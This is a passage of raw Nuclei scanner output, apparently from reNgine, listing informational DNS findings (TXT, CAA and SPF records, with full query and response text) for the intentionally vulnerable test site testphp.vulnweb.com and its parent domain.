SECTION:\\ntestphp.vulnweb.com.\\t3594\\tIN\\tTXT\\t\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:48.198669417Z\",\"matcher-status\":true}\n{\"template\":\"dns/txt-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/txt-fingerprint\",\"template-id\":\"txt-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/txt-fingerprint.yaml\",\"info\":{\"name\":\"DNS TXT Record Detected\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"txt\"],\"description\":\"A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.\",\"reference\":[\"https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"extracted-results\":[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 28261\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 28261\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntestphp.vulnweb.com.\\t3593\\tIN\\tTXT\\t\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:48.203330663Z\",\"matcher-status\":true}\n{\"template\":\"dns/caa-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/caa-fingerprint\",\"template-id\":\"caa-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/caa-fingerprint.yaml\",\"info\":{\"name\":\"CAA Record\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"caa\"],\"description\":\"A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.\",\"reference\":[\"https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"request\":\";; opcode: QUERY, status: NOERROR, id: 57568\\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 57568\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\\n;; AUTHORITY SECTION:\\nvulnweb.com.\\t86394\\tIN\\tSOA\\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\\n\",\"timestamp\":\"2024-11-13T02:34:48.204664778Z\",\"matcher-status\":true}\n{\"template\":\"dns/caa-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/caa-fingerprint\",\"template-id\":\"caa-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/caa-fingerprint.yaml\",\"info\":{\"name\":\"CAA Record\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"caa\"],\"description\":\"A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.\",\"reference\":[\"https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"request\":\";; opcode: QUERY, status: NOERROR, id: 15282\\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 15282\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\\n;; AUTHORITY SECTION:\\nvulnweb.com.\\t1793\\tIN\\tSOA\\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\\n\",\"timestamp\":\"2024-11-13T02:34:48.20525264Z\",\"matcher-status\":true}\n{\"template\":\"dns/caa-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/caa-fingerprint\",\"template-id\":\"caa-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/caa-fingerprint.yaml\",\"info\":{\"name\":\"CAA Record\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"caa\"],\"description\":\"A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.\",\"reference\":[\"https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"request\":\";; opcode: QUERY, status: NOERROR, id: 58040\\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 58040\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\\n;; AUTHORITY SECTION:\\nvulnweb.com.\\t86394\\tIN\\tSOA\\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\\n\",\"timestamp\":\"2024-11-13T02:34:48.206634819Z\",\"matcher-status\":true}\n{\"template\":\"dns/txt-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/txt-fingerprint\",\"template-id\":\"txt-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/txt-fingerprint.yaml\",\"info\":{\"name\":\"DNS TXT Record Detected\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"txt\"],\"description\":\"A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.\",\"reference\":[\"https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"extracted-results\":[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 26721\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 26721\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntestphp.vulnweb.com.\\t3593\\tIN\\tTXT\\t\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:48.207437477Z\",\"matcher-status\":true}\n{\"template\":\"dns/txt-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/txt-fingerprint\",\"template-id\":\"txt-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/txt-fingerprint.yaml\",\"info\":{\"name\":\"DNS TXT Record Detected\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"txt\"],\"description\":\"A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.\",\"reference\":[\"https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"extracted-results\":[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 5165\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 5165\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntestphp.vulnweb.com.\\t3600\\tIN\\tTXT\\t\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:48.207801632Z\",\"matcher-status\":true}\n{\"template\":\"dns/caa-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/caa-fingerprint\",\"template-id\":\"caa-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/caa-fingerprint.yaml\",\"info\":{\"name\":\"CAA Record\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"caa\"],\"description\":\"A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.\",\"reference\":[\"https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"request\":\";; opcode: QUERY, status: NOERROR, id: 13447\\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 13447\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\\n;; AUTHORITY SECTION:\\nvulnweb.com.\\t1793\\tIN\\tSOA\\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\\n\",\"timestamp\":\"2024-11-13T02:34:48.207963718Z\",\"matcher-status\":true}\n{\"template\":\"dns/caa-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/caa-fingerprint\",\"template-id\":\"caa-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/caa-fingerprint.yaml\",\"info\":{\"name\":\"CAA Record\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"caa\"],\"description\":\"A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.\",\"reference\":[\"https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"request\":\";; opcode: QUERY, status: NOERROR, id: 48581\\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 48581\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\\n;; AUTHORITY SECTION:\\nvulnweb.com.\\t86394\\tIN\\tSOA\\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\\n\",\"timestamp\":\"2024-11-13T02:34:48.208687543Z\",\"matcher-status\":true}\n{\"template\":\"dns/caa-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/caa-fingerprint\",\"template-id\":\"caa-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/caa-fingerprint.yaml\",\"info\":{\"name\":\"CAA Record\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"caa\"],\"description\":\"A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.\",\"reference\":[\"https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"request\":\";; opcode: QUERY, status: NOERROR, id: 9050\\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 9050\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\\n;; AUTHORITY SECTION:\\nvulnweb.com.\\t1793\\tIN\\tSOA\\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\\n\",\"timestamp\":\"2024-11-13T02:34:48.209212285Z\",\"matcher-status\":true}\n{\"template\":\"dns/caa-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/caa-fingerprint\",\"template-id\":\"caa-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/caa-fingerprint.yaml\",\"info\":{\"name\":\"CAA Record\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"caa\"],\"description\":\"A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.\",\"reference\":[\"https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"request\":\";; opcode: QUERY, status: NOERROR, id: 40372\\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 40372\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\\n;; AUTHORITY SECTION:\\nvulnweb.com.\\t1793\\tIN\\tSOA\\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\\n\",\"timestamp\":\"2024-11-13T02:34:48.211804327Z\",\"matcher-status\":true}\n{\"template\":\"dns/caa-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/caa-fingerprint\",\"template-id\":\"caa-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/caa-fingerprint.yaml\",\"info\":{\"name\":\"CAA Record\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"caa\"],\"description\":\"A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.\",\"reference\":[\"https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"request\":\";; opcode: QUERY, status: NOERROR, id: 44905\\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 44905\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\\n;; AUTHORITY SECTION:\\nvulnweb.com.\\t1793\\tIN\\tSOA\\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\\n\",\"timestamp\":\"2024-11-13T02:34:48.212500318Z\",\"matcher-status\":true}\n{\"template\":\"dns/caa-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/caa-fingerprint\",\"template-id\":\"caa-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/caa-fingerprint.yaml\",\"info\":{\"name\":\"CAA Record\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"caa\"],\"description\":\"A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.\",\"reference\":[\"https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"request\":\";; opcode: QUERY, status: NOERROR, id: 37255\\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 37255\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\\n;; AUTHORITY SECTION:\\nvulnweb.com.\\t1793\\tIN\\tSOA\\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\\n\",\"timestamp\":\"2024-11-13T02:34:48.216706671Z\",\"matcher-status\":true}\n{\"template\":\"dns/caa-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/caa-fingerprint\",\"template-id\":\"caa-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/caa-fingerprint.yaml\",\"info\":{\"name\":\"CAA Record\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"caa\"],\"description\":\"A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.\",\"reference\":[\"https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"request\":\";; opcode: QUERY, status: NOERROR, id: 31737\\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 31737\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\\n;; AUTHORITY SECTION:\\nvulnweb.com.\\t86400\\tIN\\tSOA\\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\\n\",\"timestamp\":\"2024-11-13T02:34:48.219906678Z\",\"matcher-status\":true}\n{\"template\":\"dns/caa-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/caa-fingerprint\",\"template-id\":\"caa-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/caa-fingerprint.yaml\",\"info\":{\"name\":\"CAA Record\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"caa\"],\"description\":\"A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.\",\"reference\":[\"https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"request\":\";; opcode: QUERY, status: NOERROR, id: 30260\\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 30260\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\\n;; AUTHORITY SECTION:\\nvulnweb.com.\\t86400\\tIN\\tSOA\\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\\n\",\"timestamp\":\"2024-11-13T02:34:48.219976324Z\",\"matcher-status\":true}\n{\"template\":\"dns/spf-record-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/spf-record-detect\",\"template-id\":\"spf-record-detect\",\"template-path\":\"/home/rengine/nuclei-templates/dns/spf-record-detect.yaml\",\"info\":{\"name\":\"SPF Record - Detection\",\"author\":[\"rxerium\"],\"tags\":[\"dns\",\"spf\"],\"description\":\"An SPF TXT record was detected\\n\",\"reference\":[\"https://www.mimecast.com/content/how-to-create-an-spf-txt-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"type\":\"dns\",\"host\":\"vulnweb.com\",\"matched-at\":\"vulnweb.com\",\"extracted-results\":[\"v=spf1 -all\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 42471\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 42471\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\nvulnweb.com.\\t3600\\tIN\\tTXT\\t\\\"v=spf1 -all\\\"\\nvulnweb.com.\\t3600\\tIN\\tTXT\\t\\\"google-site-verification=4LQORV-lTi-d4GPxtBEQWmFnwff7UAazQc9gZvHukbw\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:48.220636428Z\",\"matcher-status\":true}\n{\"template\":\"dns/caa-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/caa-fingerprint\",\"template-id\":\"caa-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/caa-fingerprint.yaml\",\"info\":{\"name\":\"CAA Record\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"caa\"],\"description\":\"A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.\",\"reference\":[\"https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"request\":\";; opcode: QUERY, status: NOERROR, id: 31770\\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 31770\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\\n;; AUTHORITY SECTION:\\nvulnweb.com.\\t1800\\tIN\\tSOA\\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\\n\",\"timestamp\":\"2024-11-13T02:34:48.238922289Z\",\"matcher-status\":true}\n{\"template\":\"dns/spf-record-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/spf-record-detect\",\"template-id\":\"spf-record-detect\",\"template-path\":\"/home/rengine/nuclei-templates/dns/spf-record-detect.yaml\",\"info\":{\"name\":\"SPF Record - Detection\",\"author\":[\"rxerium\"],\"tags\":[\"dns\",\"spf\"],\"description\":\"An SPF TXT record was detected\\n\",\"reference\":[\"https://www.mimecast.com/content/how-to-create-an-spf-txt-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"type\":\"dns\",\"host\":\"www.vulnweb.com\",\"matched-at\":\"www.vulnweb.com\",\"extracted-results\":[\"v=spf1 -all\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 33315\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT 